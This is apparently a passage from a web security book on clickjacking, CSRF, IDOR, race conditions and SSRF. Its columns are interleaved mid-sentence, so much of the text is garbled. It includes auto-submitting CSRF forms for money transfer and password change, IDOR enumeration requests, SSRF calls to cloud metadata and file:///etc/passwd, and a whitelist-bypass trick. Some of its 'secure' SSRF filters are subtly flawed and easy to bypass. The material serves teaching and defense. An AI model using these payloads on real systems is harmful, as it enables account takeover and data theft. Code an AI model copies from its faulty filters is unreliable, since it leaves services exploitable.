• Objective: To induce the user to click on an element
that was not intended.
• Technique: Superimpose an invisible frame (iframe)
over a legitimate page and place interactive elements
(buttons, links) so that they align with the visible ele-
ments of the original page.
• Example
HTML
<div style="position:relative;">
<iframe s rc = " h t t p : // l e g i t i m a t e - s i t e . c o m "
style="width:500px;height:300px;"></iframe>
<button style="position:absolute;top:50px;left:100px;">-
Click here to win!</button>
</div>
2. Clickjacking Escalation: Beyond the Click
• Credential Theft: Using clickjacking to trick users into
entering their credentials into a fake form superimpo-
sed over a legitimate login page.
• Configuration Changes: Inducing users to change
their account settings (e.g., enabling remote access)
without their knowledge.
• Unwanted Posting: Tricking users into posting unwan-
ted content on their social networks or performing
actions on other platforms.
• Malware Installation: Hiding a malware download link
under a seemingly harmless button.
• Likejacking: Tricking users into clicking "Like" on
Facebook pages without their consent.
• Cursorjacking: Manipulate the mouse cursor so that
the user clicks in a different place than intended.
66 MILLIONAIRE RECORDS
3. Advanced Clickjacking Techniques
• Clickjacking Combined with XSS: Using an XSS vul-
nerability to inject code that performs a clickjacking
attack, making it difficult to detect.
• Clickjacking on Mobile Devices: Adapt the techni-
que to take advantage of the specific characteristics
of touch screens.
• Clickjacking in Rich Web Applications: Exploiting the
complex interactions of web applications to perform
more sophisticated attacks.
4. Clickjacking Defenses
• X-Frame-Options: Configure this HTTP header to
control whether a page can be embedded in an iframe.
• Content Security Policy (CSP): Define a security
policy that restricts the uploading of content from
other domains.
• Framebusting Scripts: Use JavaScript to detect if a
page is being embedded in an iframe and take action
(e.g. redirect the user).
• User Awareness: Educate users about clickjacking
and how to recognize it.
Example of Escalated Clickjacking Attack
An attacker could create a web page that looks like a har-
mless online game. However, this page would contain an invisible
iframe superimposed over a bank transfer form from a legitimate
website. By clicking on the game buttons, the user would unk-
nowingly be transferring money from his or her bank account.
web vulnerabilities 67
2 . 5 - CR O S S - S I T E R E- the request is made with the user's active session and the money
is transferred to the attacker's account.

QU ES T F O R G E R Y # 2. 5 Example 2: Password Change in a User AccountConsider

a website that allows users to change their password. An atta-
cker can create a hidden form that, when submitted, changes
Cross-Site Request Forgery (CSRF) is a type of web security the user's password to a password controlled by the attacker.
vulnerability that allows an attacker to induce users to perform
unwanted actions on a web application to which they are authen- --------------
ticated. It is a dangerous vulnerability because it exploits the <!DOCTYPE html>
trust that a website has in a user's browser. <html>
<body>
Understanding CSRF <h1>¡Click here to watch a funny video!</h1>
<form action="http://example-website.com/change_pas-
A CSRF attack occurs when an authenticated user in a web sword" method="POST" style="display:none;">
application is tricked into performing an unwanted action in that <input type="hidden" name="new_password"
application, without the user's consent. The attacker exploits the value="new_attacker_password">
user's active session and sends malicious requests on the user's <input type="hidden" name="confirm_password"
behalf, without the user's knowledge. value="new_attacker_password">
</form>
Real-life examples of CSRF <script>
document.forms[0].submit();
Let's explore some real-world examples to understand how </script>
CSRF works and the risks it can entail. </body>
</html>
Example 1: Transferring Money in an Online Banking System. --------------
Imagine an online banking system where users can transfer money
to other accounts. An attacker can create a malicious HTML form In this case, when the authenticated user loads the malicious
that, when uploaded by an authenticated user, sends a request to page, the hidden form is automatically submitted, changing the
transfer money from the user's account to the attacker's account. user's password to one that the attacker controls.

-------------- Risks and Consequences

<!DOCTYPE html>
<html> CSRF attacks can have several serious consequences:Unau-
<body> thorized Transfer of Funds: As seen in the online banking exam-
<h1>Click here to win a prize!</h1> ple, the attacker can transfer money from the user's account to
<img src="http://example-bank.com/transfer?amoun- his own account.
t=1000&to_account=attacker_account" style="display:none;"> Changing Critical Settings: The attacker can change impor-
</body> tant settings in the user's account, such as the password, email
</html> address, or security preferences.
-------------- Performing Malicious Actions: The attacker can perform
other unwanted actions on behalf of the user, such as posting
In this example, when the authenticated user loads the unwanted content on social networks or sending messages from
malicious page, the browser automatically sends a GET request the user's account.
to the wire transfer URL. Since the user is already authenticated,

68 MILLIONAIRE RECORDS
 CSRF Prevention

To prevent CSRF attacks, web developers should implement

the following measures:

1. Tokens CSRF: It uses unique and random tokens for each

request that modifies the state of the server. These tokens must
be included in the forms and verified on the server before pro-
cessing the request.

--------------
<form action="/change_password" method="POST">
<input type="hidden" name="csrf_token"
value="random_token">
<!-- Other form fields -->
</form>
--------------

2. Referer and Origin headers: Check the HTTP Referer

and Origin headers to ensure that the requests come from trus-
ted sources.

--------------
// PHP example
if ($_SERVER['HTTP_REFERER'] !== 'https://example-we-
bsite.com') {
die('Unauthorized request');
}

3. SameSite Cookies: Set session cookies with the SameSite

attribute to prevent them from being sent in cross-origin requests.

--------------
Set-Cookie: sessionid=abc123; SameSite=Strict; Secure;
HttpOnly
--------------

CSRF is a critical vulnerability that can lead to serious conse-

quences if not handled properly. By understanding how it works
and learning from real-world examples, you can better protect
your web applications and your users. Implement CSRF tokens,
verify HTTP headers and configure session cookies correctly to
mitigate the risks associated with CSRF.

web vulnerabilities 69

Advanced search
CSRF is a type of attack that tricks an authenticated user
into performing unwanted actions on a web application to which
they are logged in. This chapter delves into the techniques and
tools used to identify and exploit CSRF vulnerabilities, as well
as key defensive measures.
1. Understanding CSRF
• How it works: An attacker sends a malicious link or
form to the victim, who, upon clicking or interacting
with it, unknowingly sends a request to the vulnerable
web application. The application processes the request
as if it came from the legitimate user, which can lead
to unauthorized changes to data or settings.
• Example: An attacker sends a link to the victim that
looks harmless, but actually contains a hidden request
to transfer money from the victim's bank account to
the attacker.
2. Identifying CSRF Vulnerabilities
• Manual Analysis: Examine the source code and appli-
cation behavior for requests that do not properly verify
the origin of the request or lack anti-CSRF tokens.
• Automated Tools:
1. Vulnerability Scanners: Burp Suite, OWASP ZAP: Can
automatically detect possible CSRF vulnerabilities in
a web application.
2. Browser Extensions: CSRF Tester, Tamper Data: Allow
to modify and resend requests to test for the pre-
sence of CSRF.
Example: Using Burp Suite to intercept and modify a legi-
timate application, removing or modifying the anti-CSRF
token, to verify if the application is vulnerable.
3. Exploiting CSRF Vulnerabilities
• Creation of Malicious Payloads: Generate links,
forms or JavaScript code that, when executed by the
victim, send the malicious request to the vulnerable
application.
70 MILLIONAIRE RECORDS
• Link-Based Attacks: Sending malicious links via email,
instant messages or social networks, enticing the vic-
tim to click on them.
• Form-Based Attacks: Inserting hidden forms in web-
sites that the victim visits frequently, taking advantage
of the browser's autocomplete function to send unau-
thorized requests.
• JavaScript-based attacks: Injecting malicious
JavaScript code into legitimate websites that the vic-
tim visits to send CSRF requests without their direct
interaction.
Example: Create a hidden form on a popular website that,
when loaded, sends a request to change the email address
associated with the victim's account in another vulnerable
application.
4. Defensive Measures against CSRF
• Anti-CSRF tokens: Generate unique and unpredic-
table tokens for each request and verify their validity
on the server side.
• Verification of the Request Origin (Origin Header):
Ensure that the requests come from the same origin
(domain, port, protocol) as the web application.
• SameSite Cookies: Set cookies with the SameSite attri-
bute to restrict their delivery to cross-origin requests.
• CSRF Protection in Web Frameworks: Many web fra-
meworks offer built-in CSRF protection mechanisms.
• Example: Implement an anti-CSRF token in a pas-
sword change form, so that each time the form is loa-
ded, a new token is generated and its validity is che-
cked when the request is submitted.
Additional Considerations
• CSRF in APIs: RESTful APIs can also be vulnerable
to CSRF if appropriate protection measures are not
implemented.
• CSRF in Single Page Applications (SPA): SPAs may
require specific CSRF mitigation strategies due to their
dynamic nature.
 • Example:
Bypass protection 1. An attacker can create a malicious link that, when
clicked, sends a GET request with malicious JSON data.
CSRF protection mechanisms are designed to prevent these • Solution:
attacks, but clever attackers often find ways to evade them. This 1. Do not accept JSON requests via GET.
chapter explores the techniques and strategies attackers use to 2. Use HTTP POST verbs for requests that modify
circumvent CSRF protections and how developers can streng- data.
then their defenses.
4. CSRF Flash Attacks
1. Weak or Predictable CSRF Tokens
• Issue: Adobe Flash had a vulnerability that allowed
• Problem: If CSRF tokens are easy to guess or predict, attackers to bypass CSRF protections by manipulating
attackers can spoof valid requests. Flash policy files (crossdomain.xml).
• Examples: • Solution:
1. Tokens based on simple patterns (e.g., numerical 1. Flash is no longer supported by most browsers,
sequences). which mitigates this issue.
2. Tokens that do not change frequently enough. 2. Ensure that Flash policy files are configured cor-
3. Tokens stored in insecure locations (e.g., cookies rectly to restrict cross-domain access.
without the HttpOnly attribute).
• Solution: 5. XSS Based Attacks
1. Generate cryptographically secure and random CSRF
tokens. • Problem: If a website is vulnerable to XSS, an atta-
2. Change tokens with each request or session. cker can inject a malicious script that makes CSRF
3. Store tokens on the server side (e.g., in the user's requests on behalf of the user.
session). • Solution:
1. Protecting against XSS is critical to prevent XSS-
2. Referer Header Spoofing based CSRF attacks.
2. Implement a content security policy (CSP) to restrict
• Problem: Some CSRF protection mechanisms rely on script execution.
the Referer header to verify the origin of the request.
Attackers can spoof this header. 6. Social Engineering
• Example:
1. An attacker can send a CSRF request from his own • Problem: Attackers can use social engineering
website and set the Referer header to match the des- techniques to trick users into clicking on malicious
tination website. links or performing actions that trigger CSRF attacks.
• Solution: • Solution:
1. Do not rely solely on the Referer header. 1. Educate users about CSRF risks and how to iden-
2. Combine the Referer header with other CSRF pro- tify suspicious links and emails.
tection mechanisms, such as tokens.
CSRF Protection Best Practices
3. JSON CSRF with HTTP GET Verbs
• Use cryptographically secure and random CSRF tokens.
• Problem: Some websites accept JSON requests via • Change tokens with each request or session.
the HTTP GET verb, which facilitates CSRF attacks, as • Store tokens on the server side.
attackers can include the JSON payload in the URL. • Do not rely solely on the Referer header.

web vulnerabilities 71
 • Do not accept JSON requests via GET.
• Protect against XSS.Educate users about CSRF risks.
Escaling the attack
Cross-Site Request Forgery (CSRF) attacks are a significant
threat to web applications, as they allow attackers to perform
unauthorized actions on behalf of a legitimate user. This chapter
dives into advanced techniques that attackers can use to esca-
late their CSRF attacks and cause greater impact.
1. Flash CSRF
• Objective: Exploit Adobe Flash functionality to bypass
some traditional CSRF protections.
• Technique: Flash SWF files can make HTTP requests
without being subject to the same-origin policy,
allowing attackers to send CSRF requests from dif-
ferent domains.
• Mitigation: Disable Flash or restrict its access to spe-
cific domains.
2. JSON CSRF
• Objective: Exploit web applications that accept data
in JSON format.
• Technique: Attackers can create forms or scripts that
send POST requests with malicious JSON data to the
vulnerable application.
• Mitigation: Implement CSRF tokens in JSON requests
and validate the content type of the requests.
3. Partial Page CSRF
• Objective: Attack web applications that use AJAX to
load dynamic content.
• Technique: Attackers can send CSRF requests that
target specific AJAX endpoints, which can result in
unauthorized page changes.
• Mitigation: Protect AJAX endpoints with CSRF tokens
and validate requests.
72 MILLIONAIRE RECORDS
4. Header-Based CSRF
• Objective: Evade CSRF protections that focus
on form parameters or request body. Technique:
Attackers can inject malicious CSRF tokens into custom
HTTP headers, such as Referer or X-Requested-With.
• Mitigation: Validate CSRF tokens in all possible loca-
tions, including HTTP headers.
5. Supply Chain CSRF
• Objective: Attack web applications through CSRF
vulnerabilities in libraries or third-party components
they use.
• Technique: Attackers can inject malicious code into a
third-party library or component that is then included
in the targeted web application.
• Mitigation: Keep libraries and components up to date,
audit third-party code for CSRF vulnerabilities.
6. CSRF Combined with Other Vulnerabilities
• Objective: Increase the impact of a CSRF attack by
combining it with other vulnerabilities, such as XSS
or SQL injection.
• Technique: Attackers can use CSRF to inject mali-
cious code that exploits other vulnerabilities in the
application.
• Mitigation: Implement a layered defense against
multiple vulnerabilities, including CSRF, XSS and SQL
injection.
Advanced CSRF Defenses
• Robust CSRF tokens: Use unpredictable and unique
CSRF tokens for each user and session.
• Double Submit Cookies: Submit the CSRF token in
both a cookie and a form parameter.
• Strict Validation: Validate the origin of the request,
the CSRF token and other relevant parameters.
• SameSite Cookies: Configure cookies with the
SameSite attribute to restrict their delivery in cros-
s-site requests.
web vulnerabilities 73
2 . 6 - I D O R # 2. 6
Insecure Direct Object References (IDOR) is a security vul-
nerability that occurs when a web application provides direct
access to objects based on user input without verifying proper
permissions. This can allow an attacker to access data and resour-
ces that they should not have by simply modifying parameters
in the URL or requests.
Understanding IDOR
IDOR occurs when an application uses direct object iden-
tifiers in URLs or request parameters without properly verifying
whether the user has permissions to access those objects. This
lack of access control can lead to exposure of sensitive data and
manipulation of resources.
Real-life examples of IDOR
Let's look at some real examples to understand how IDOR
works and the risks it may entail.
Example 1: Access to User Data
Imagine an account management system where users can
view their profiles using a URL like the following:
--------------
https://example.com/profile?id=123
--------------
Where id=123 is the profile identifier of the authenticated
user. An attacker who is also a user of the system can change
the value of the id parameter to another identifier, for example:
--------------
https://example.com/profile?id=124
--------------
If the application does not verify that the authenticated user
has permissions to access the profile with id=124, the attacker
can view the profile data of another user.
74 MILLIONAIRE RECORDS
Example 2: Downloading Sensitive Files
Consider an application that allows users to download their
documents using a URL such as the following:
--------------
https://example.com/download?file=invoice123.pdf
--------------
An attacker can modify the value of the file parameter to
download a document that does not belong to him:
--------------
https://example.com/download?file=invoice124.pdf
--------------
If the application does not verify access permissions to the
invoice124.pdf file, the attacker can download sensitive docu-
ments from other users.
Risks and Consequences
IDOR attacks can have several serious consequences:
1. Sensitive Data Exposure: The attacker can access other
users' personal, financial or medical information.
2. Resource Manipulation: The attacker can modify or
delete resources that do not belong to him, such as
logs, files or settings.
3. Legal and Reputational Risk: Exposure of sensitive
data can lead to legal consequences and damage the
company's reputation.
 IDOR prevention
To prevent IDOR attacks, web developers should imple-
ment the following measures:
1. Rigorous Access Control: Ensure that all requests acces-
sing specific objects or data verify that the authenticated user
has the appropriate permissions.
IDOR is a critical vulnerability that can lead to serious conse-
quences if not handled properly. By understanding how it works
and learning from real-world examples, you can better protect
your web applications and your users. Implement stringent access
controls, use indirect identifiers and ensure server-side validation
and authorization to mitigate the risks associated with IDOR.

--------------
// PHP Example
$user_id = $_SESSION['user_id'];
$requested_profile_id = $_GET['id'];
--------------

--------------
// Verify that the user has permissions to access the reques-
ted profile
if (!hasAccessToProfile($user_id, $requested_profile_id)) {
die('Unauthorized access');
}
--------------

2. Use of Indirect Identifiers: Instead of using direct identi-

fiers in URLs, use indirect identifiers that cannot be easily gues-
sed or manipulated by an attacker.

--------------
// Generate a unique identifier for each object
$unique_id = generateUniqueIdentifier($object_id);
--------------

3. Server Validation and Authorization: Implements vali-

dation and authorization controls on the server to ensure that
each request is legitimate and that the user has permissions to
perform the requested action.

--------------
// Validate and authorize the request on the server
if (!isValidRequest($request) || !isAuthorized($user, $action)) {
die('Invalid or unauthorized request');
}
--------------

web vulnerabilities 75

Advanced search
IDOR vulnerabilities are a type of authorization flaw that
allows attackers to access resources they should not have access
to. This occurs when a web application uses user input directly
to access objects or data without performing proper authoriza-
tion checks. This chapter delves into the identification, exploi-
tation and prevention of IDOR.
1. Understanding IDOR
3. Exploiting IDOR
Parameter manipulation
• Increment or decrement values: Change the value
of an ID parameter to try to access adjacent resources.
• Test predictable values: If the IDs are sequential
or follow a pattern, test nearby values to find other
resources.
• Utilizar herramientas de fuerza bruta: Automatizar
la prueba de diferentes valores de parámetros para
encontrar ID válidos.

• Definition: IDOR occurs when an application expo- Privilege escalation attacks:

ses a direct reference to an internal object (such as a
file ID, user ID or password) in a URL, form or other
medium. If the application does not check whether the
user has permission to access that object, an attacker
can manipulate the reference to access unauthorized
resources.
• Examples:
1. Vulnerable URL: https://example.com/profile?user_
id=123 (an attacker could change user_id to view the
profile of another user).
2. Vulnerable form: A form that allows users to down-
load invoices, but does not verify if the user has per-
mission to view the requested invoice.
• Change roles: If the application uses role IDs, try
to change the user's role ID to gain access to restric-
ted functions.
• Change user ID: Attempt to change the user ID to
impersonate another user and access their data.
Additional Tips
• Pay attention to error messages: Error messages can
reveal information about the internal structure of the
application and facilitate IDOR exploitation.
• Do not rely on security by obscurity: Hiding IDs is not
an effective solution, as attackers can discover them
by reverse engineering or guessing.

2. Identifying IDOR

Manual analysis:
• Check URLs: Look for parameters in URLs that may
be direct references to objects (e.g., id, user_id, file_id).
• Test variations: Attempt to modify parameter values
to see if other resources can be accessed.
• Analyze responses: Search for sensitive information
that is disclosed without authorization (e.g., user names,
email addresses, financial data).

Automated tools:
• Vulnerability scanners: Use web scanners to identify
common IDOR patterns (e.g., Burp Suite, OWASP ZAP).
• Interceptores de tráfico: Analizar el tráfico entre el
navegador y la aplicación web para buscar referencias
directas a objetos y posibles vulnerabilidades IDOR.

76 MILLIONAIRE RECORDS
 Race Condition Attacks:
Bypass protection • Description: Attackers exploit race conditions in the
application to access temporarily accessible resources.
• Example: Send multiple simultaneous requests to
Understanding IDOR perform an action before access controls are applied.

IDOR occurs when a web application exposes direct refe-
rences to internal objects (such as files, database records or
user identifiers) without implementing adequate access con-
trols. This allows attackers to manipulate these references
to access sensitive data or perform unauthorized actions.
IDOR Protection Avoidance Techniques
Guessing or Predicting Identifiers
• Description: Attackers attempt to guess or pre-
dict sequential identifiers or predictable patterns in
object references.
• Example: Changing the user ID in a URL to access
another user's data.
Real World Examples of IDOR Attacks
• Facebook: In 2019, an IDOR vulnerability was dis-
covered that allowed attackers to access private pho-
tos of users.
• Shopify: In 2020, an IDOR vulnerability was disclo-
sed that allowed attackers to access order information
from other merchants.
• Instagram: In 2021, an IDOR vulnerability was found
that allowed attackers to view and download private
photos and videos.

Parameter Manipulation:
• Description: Attackers modify the parameters of
an HTTP request to access restricted resources.
• Example: Changing the value of a hidden parame-
ter in a form to modify the behavior of the application.

Brute Force Attacks:

• Description: Attackers systematically try different
values for identifiers until they find a valid one.
• Example: Automate the testing of different order
numbers to find orders from other users.

Enumeration Attacks:
• Description: Attackers collect information about
the application structure and valid identifiers.
• Example: Analyze source code or application res-
ponses to identify patterns in identifiers.

Timing attacks:
• Description: Attackers measure application res-
ponse time to infer information about valid identifiers.
• Example: Observe differences in response time
when accessing valid and invalid resources.

web vulnerabilities 77
 Escalating the attack
IDORs can be exploited in various ways to escalate attacks:
- Data enumeration: An attacker can iterate through a
range of identifiers to discover and access additional
resources.
- Sensitive data access: An attacker can access sensitive
information, such as personal, financial or authentica-
tion data.
- Unauthorized modification: An attacker can change
the state of resources, such as the status of an order
or a user's permissions.
- Data deletion: An attacker can delete resources, such
as files or database records.
IDOR Mitigation
- Authorization verification: Implement strict authori-
zation controls for each request that accesses or modi-
fies a resource.
- Use of indirect identifiers: Use indirect identifiers
(UUIDs, tokens) instead of direct references.
- Parameter validation: Validate all input parameters to
ensure they are valid and expected.
- Principle of least privilege: Grant users only the per-
missions necessary to perform their tasks.
IDOR detection tools
- Web vulnerability scanners: Burp Suite, OWASP ZAP
- Manual testing: Careful analysis of application requests
and responses.
Examples of payloads for detecting IDOR
GET /api/user/123/profile HTTP/1.1
GET /api/user/124/profile HTTP/1.1
GET /api/user/1/profile HTTP/1.1
By changing the user ID in the URL, you can try to access
other users' profiles if the application is vulnerable to IDOR.
78 MILLIONAIRE RECORDS
Automating the attack
IDOR (Insecure Direct Object References) vulnerabilities can
be exploited manually, but automation allows attackers to
scale their efforts and discover a larger number of IDORs
more efficiently. This chapter delves into techniques and
tools to automate the detection and exploitation of these
vulnerabilities.
1. Automated IDORs Recognition
- Objective: To identify patterns and structures in URLs
and parameters that suggest the presence of IDORs.
- Tools:
1. Web Crawlers: Collect URLs and website parameters
for further analysis.
2. Traffic Analyzers: Examine HTTP requests and res-
ponses to identify numerical or sequential patterns in
parameters.
3. Custom Scripts: Develop scripts to look for specific
patterns in URLs or parameters.
- Example: Use a web crawler to collect all the URLs of
a website, then analyze them for parameters containing
incremental numeric identifiers (e.g., user_id=123).
2. Parameter Fuzzing
- Objective: To systematically test different parameter
values to detect IDORs.
- Tools:
1. Fuzzers: They automatically send different values
(numbers, sequences, etc.) to the identified parameters.
2. Penetration testing frameworks: They include para-
meter fuzzing functionalities.
- Example: Using a fuzzer to send different numeric
values to the user_id parameter in a URL and observe
if other users' information is accessed.
3. Response Analysis
- Objective: Detect changes in server responses that
indicate the existence of an IDOR..
- Tools:
1. Response comparators: Compare the responses
obtained by modifying the parameter values.
2. Custom scripts: Analyze responses for sensitive infor
mation that should not be accessible.
3. Example: Compare the responses obtained when acces
sing /user/123 and /user/124 to verify if data from diffe
rent users is displayed.

4. Automated Exploitation

- Objective: Once an IDOR has been identified, auto-

mate exploitation to gain unauthorized access to data
or perform unauthorized actions.
- Tools:
1. Custom scripts: Develop scripts to iterate over dif-
ferent parameter values and perform specific actions
(e.g., download files, modify data).
2. Penetration testing frameworks: Some frameworks
allow automating the exploitation of IDORs.

Example: Develop a script that iterates over different values

of the order_id parameter to download invoices from other
users.

5. Monitoring and Alert

- Objective: Receive real-time notifications when an

IDOR is discovered.
- Tools:
1. Custom Scripts: Configure scripts to send alerts via
email, Slack, etc.
2. Security monitoring platforms: Integrate IDOR detec-
tion tools with monitoring platforms to receive cen-
tralized alerts.

Example: Configure a script to send an email alert whene-

ver a significant change in the server response is detected
when a parameter is modified.

Legal and Ethical Considerations

Automation of IDOR attacks must be performed respon-

sibly and ethically. It is crucial to obtain proper consent
before testing on third-party systems and to avoid causing
damage or disruption.

web vulnerabilities 79
2 . 7 - R AC E C O NDI TI O N
#2.7
Race Conditions are a type of vulnerability in applications
where the behavior of the system depends on the sequencing
or synchronization of events that can run in parallel. This type of
vulnerability occurs when multiple processes or threads access
and manipulate a shared resource simultaneously, without pro-
per coordination, which can lead to unpredictable and often
dangerous results.
Understanding Career Conditions
Race conditions occur when two or more operations are
executed at the same time and compete for the same resource,
causing inconsistency in results. Lack of proper synchronization
between these operations can lead to situations where actions
overlap, resulting in unexpected or erroneous execution.
Real Examples of Career Conditions
To better understand race conditions, let's look at some
real-world examples that illustrate how they can manifest them-
selves and what implications they can have.
Example 1: Bank Transfers
Imagine a banking system where a user can transfer money
from his account to another. Consider the following scenario:
- User A has $100 in his account
- .User A initiates two transfers of $50 each to user B's
account almost simultaneously.
If the system does not handle the race conditions properly, both
transfers could read the initial balance of $100 at the same time,
and each would deduct $50, resulting in a final balance of $0
in user A's account and $100 in user B's account, instead of the
correct balance of $50.
80 MILLIONAIRE RECORDS
Example 2: Ticket Reservations
Consider a ticketing application for an event. Suppose
two users try to buy the last available ticket at the same time.
The system must check the availability of the ticket and then
reserve it for the user. If both users manage to reserve the
same ticket due to a race condition, the system could sell more
tickets than available, causing logistical and financial problems.
Risks and Consequences
Race conditions can have serious consequences on
applications:
- Data Inconsistencies: Data can be left in an inconsistent
or corrupted state, which can affect system integrity.
- Vulnerability Exploitation: Attackers can exploit
race conditions to perform unauthorized actions,
such as money transfers or resource reservations.
Service Disruption: Race conditions can lead to sys-
tem failures, disrupting service and affecting users.
Preventing Race Conditions
To prevent race conditions, it is essential to implement proper
synchronization mechanisms. Here are some common techniques:
1. Resource locking: Use locking mechanisms to ensure that
only one process or thread can access a shared resource at a time.
----------
import threading
# Crear un bloqueo
lock = threading.Lock()
def transfer(account, amount):
with lock:
# Operaciones seguras
account.balance -= amount
----------
 - Atomic Transactions: Ensure that critical transactions Race conditions are critical vulnerabilities that can have
are performed atomically, i.e. as a single indivisible unit. serious implications for application integrity and security.
Understanding how they work and learning from real-world
---------- examples can help you better protect your systems and
BEGIN TRANSACTION; data. Implement proper synchronization mechanisms, use
UPDATE accounts SET balance = balance - 50 WHERE resource locks and ensure that critical operations are per-
account_id = 'A'; formed atomically to mitigate the risks associated with
UPDATE accounts SET balance = balance + 50 WHERE race conditions.
account_id = 'B';
COMMIT;
----------

- Double-Checked Locking: Double-check twice

before performing an operation to ensure that
the status has not changed between checks.

----------
public class Singleton {
private static volatile Singleton instance;

public static Singleton getInstance() {

if (instance == null) {
synchronized (Singleton.class) {
if (instance == null) {
instance = new Singleton();
}
}
}
return instance;
}
}
----------

4. Race Conditions in Web Applications: In the context of web

applications, techniques such as lock tokens and optimistic
concurrency control can be used to manage concurrent access.

web vulnerabilities 81
2 . 8 - SER V E R - S I DE R E-
QU ES T F O R G E R Y # 2. 8
Server-Side Request Forgery (SSRF) is a type of vulnerability
in web applications where an attacker can manipulate the server
to make requests to arbitrary resources, both internal and exter-
nal. This vulnerability allows an attacker to interact with internal
server services, access sensitive information and, in some cases,
execute malicious commands.
Entendiendo SSRF
The SSRF vulnerability occurs when a web application takes
user-controlled input and uses it to generate a request on the
server without proper validation. This allows an attacker to redi-
rect the request to a destination of their choice, which can be
another server or an internal service.
Ejemplos Reales de SSRF
To better understand SSRF, let's look at some real-world
examples that show how this vulnerability can be exploited and
its possible implications.
Ejemplo 1: Escaneo de Redes Internas
Imagine a system that allows users to provide a URL to
preview the content of that page. If the application does not
properly validate the URL provided, an attacker can supply an
internal URL and perform a scan of the server's internal network.
-----------
def get_preview(url):
response = requests.get(url)
return response.content
# Ataque SSRF
get_preview("http://192.168.1.1/admin")
-----------
In this example, an attacker could use the get_preview func-
tion to access internal services, such as an administration panel
82 MILLIONAIRE RECORDS
on a private network.
Example 2: Metadata Access in Cloud Services
In many cloud computing platforms, such as AWS, there are
metadata services accessible at a specific IP address that con-
tain sensitive information. An attacker can use SSRF to access
this metadata.
-----------
def fetch_metadata():
url = "http://169.254.169.254/latest/meta-data/"
response = requests.get(url)
return response.content
# Ataque SSRF
fetch_metadata()
-----------
In this case, an attacker could obtain sensitive informa-
tion about cloud instances, such as temporary IAM cre-
dentials in AWS.
Risks and Consequences
SSRF vulnerabilities can have serious consequences for the
security of an application:
• Unauthorized Access: Attackers can access inter-
nal resources that are not intended to be exposed
externally.
• Data Exfiltration: Attackers can extract sensitive data,
such as internal service credentials and metadata from
cloud instances.
• Sideways Movement: Attackers can use SSRF to scan
and attack other systems within the internal network.
• Command Execution: In some cases, attackers can leve-
rage SSRF to execute commands on internal systems,
further compromising the infrastructure.
 Prevención de SSRF are on a whitelist of trusted domains.

To prevent SSRF, it is essential to implement security -----------

measures that limit the ability of attackers to manipu- ALLOWED_DOMAINS = ["trusted-domain.com"]
late server requests. Here are some common techniques:
def is_allowed_domain(url):
1. Input Validation and Sanitization: Always validate and parsed_url = urlparse(url)
sanitize the input provided by the user to ensure that only safe return any(domain in parsed_url.netloc for domain in
and expected URLs are allowed. ALLOWED_DOMAINS)

----------- def get_preview(url):

def is_valid_url(url): if is_allowed_domain(url):
parsed_url = urlparse(url) response = requests.get(url)
return parsed_url.scheme in ["http", "https"] and "truste- return response.content
d-domain.com" in parsed_url.netloc else:
raise ValueError("Dominio no permitido")
def get_preview(url): -----------
if is_valid_url(url):
response = requests.get(url) Server-Side Request Forgery (SSRF) is a critical vulnerability
return response.content that can severely compromise the security of an application and
else: its underlying infrastructure. By understanding how SSRF works
raise ValueError("URL no válida") and how attackers can exploit it, you can implement effective
----------- security measures to protect your systems. Remember to always
validate and sanitize user input, block unauthorized access to
2. Internal IP Address Blocking: Implements rules internal resources, and use additional techniques such as pro-
to block requests to internal and reserved IP addresses. xies and whitelisting to mitigate the risks associated with SSRF.

-----------
def is_internal_ip(ip_address):
return ip_address.startswith("192.168.") or ip_address.
startswith("10.") or ip_address.startswith("172.16.")

def get_preview(url):
parsed_url = urlparse(url)
ip_address = socket.gethostbyname(parsed_url.hostname)
if is_internal_ip(ip_address):
raise ValueError("Acceso no autorizado a IP interna")
response = requests.get(url)
return response.content
-----------

3. Use of Proxies: Use proxy servers that can filter and

control outgoing server requests.

4. Whitelisting Implementation: Allows only URLs that

web vulnerabilities 83

Advanced Search
SSRF (Server Side Request Forgery Facility) vulnerabilities
are a class of security flaws that allow an attacker to send
arbitrary requests from the application server to internal or
external destinations. This chapter explores techniques and
strategies to find and exploit these vulnerabilities, revealing
their potential impact and how to mitigate them.
1. What is SSRF?
- Definition: An SSRF attack occurs when an attacker can
control the URL to which a server sends a request. This
can allow him to access restricted internal resources, per-
form actions on behalf of the server or even interact with
external systems.
- Basic example: A web application that retrieves images
from a user-supplied URL. An attacker could enter a URL
pointing to a sensitive internal resource, such as an adminis-
tration panel, and access it through the application's server.
2. Type of SSRF
- Basic: The attacker can directly control the destination
URL.
- Blind: The attacker does not see the server's response, but
can infer information based on the application's behavior.
- Partially blind: The attacker receives a partial or modified
response from the server.
3. Techniques for finding SSRF
- Source code analysis: Search for functions that perform
HTTP requests, such as file_get_contents, curl or fsockopen.
- Traffic analysis: Examine HTTP requests sent by the appli-
cation for suspicious patterns.
- Fuzzing: Sending malicious inputs to the parameters that
control the target URLs to check if they are vulnerable.
- Tools: Burp Suite, ZAP, ffuf, etc.
4. SSRF Exploitation
- Access to internal resources: Access to administration
84 MILLIONAIRE RECORDS
panels, cloud instance metadata, internal API interfaces, etc.
- Port scanning: Scanning of internal ports to discover vul-
nerable services.
- Attacks on other servers: Use of the vulnerable server as
a proxy to attack other systems.
- Remote code execution (RCE): In some cases, SSRF can
lead to RCE if the target server is vulnerable.
5. SSRF mitigation
- Inbound validation: Strictly validate target URLs, allowing
only specific domains and ports.
- Whitelisting: Use a whitelist of allowed URLs.
- Disable unnecessary protocols: If the application only
needs HTTP(S), disable other protocols such as file://, dict://,
gopher://, etc.
- Web Application Firewall (WAF): Configure the WAF to
block suspicious requests.
Examples of SSRF payloads
- http://localhost/admin
- http://127.0.0.1:8080
- file:///etc/passwd
- dict://localhost:2625/info
Final Considerations
SSRF is a dangerous vulnerability that can have serious con-
sequences. It is crucial that developers and system admi-
nistrators understand the risks and take steps to prevent
and mitigate these attacks.

Bypass protection
Developers implement various protections to mitigate SSRF
risks, but crafty attackers are always looking for ways to
bypass these defenses. This chapter explores common
techniques for bypassing SSRF protection and how defen-
ders can strengthen their systems.
1. Domain and URL whitelisting
1. Protection: Restricts requests to a predefined set of
domains or URLs. 2.
2. Bypass:
- Prefix/suffix technique: Adding characters before or after
the allowed domain. Example: http://localhost@dominio-
-permitido.com.
